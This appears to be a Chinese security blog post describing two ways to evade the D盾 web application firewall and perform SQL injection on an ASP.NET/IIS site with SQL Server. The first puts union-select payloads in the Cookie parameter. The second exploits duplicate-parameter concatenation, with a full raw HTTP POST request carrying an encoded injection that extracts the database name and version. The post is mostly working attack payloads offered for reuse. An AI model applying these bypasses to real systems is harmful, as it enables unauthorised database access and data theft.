最新绕过D盾注入方法分享（学姿势）

Power7089

发布于 2020-07-27 16:51:02

6.4K00

代码可运行

文章被收录于专栏：闪石星曜CyberSecurity闪石星曜CyberSecurity

运行总次数：0

代码可运行

测试环境

测试版本：D盾 v2.1.4.4(测试版)
环境：iis7.5+SQLserver 2012

方法一：SQL语句拦截

www.d123.com/news.aspx?id=1 union select

aspx 代码是用 Request.Params 获取参数，所以可以获取 COOKIE GET POST 这三种方法参数的值。

string id = Request.Params[“id”];

而且获取参数具有优先级

cookie->post->get

D盾是没有拦截 Cookie 参数可以绕过

-1 union select 1,db_name(),@@version

测试：绕过获取数据库信息

本文由“壹伴编辑器”提供技术支持

方法二

string id = Request.Params[“id”];

在 aspx 传入的参数如果重复系统会进行拼接，id=1&id=2 会等价于 id=1,2

Asp.net + iis：id=1,2,3

测试：

POST /news.aspx?id=1.8eunion/ 
HTTP/1.1 
Host: www.d123.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 
Connection: close 
Cookie: _d_id=4400020b0469c82ad109c2a344f34a

Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 40 id=%001/select 1,@@version,db_name()–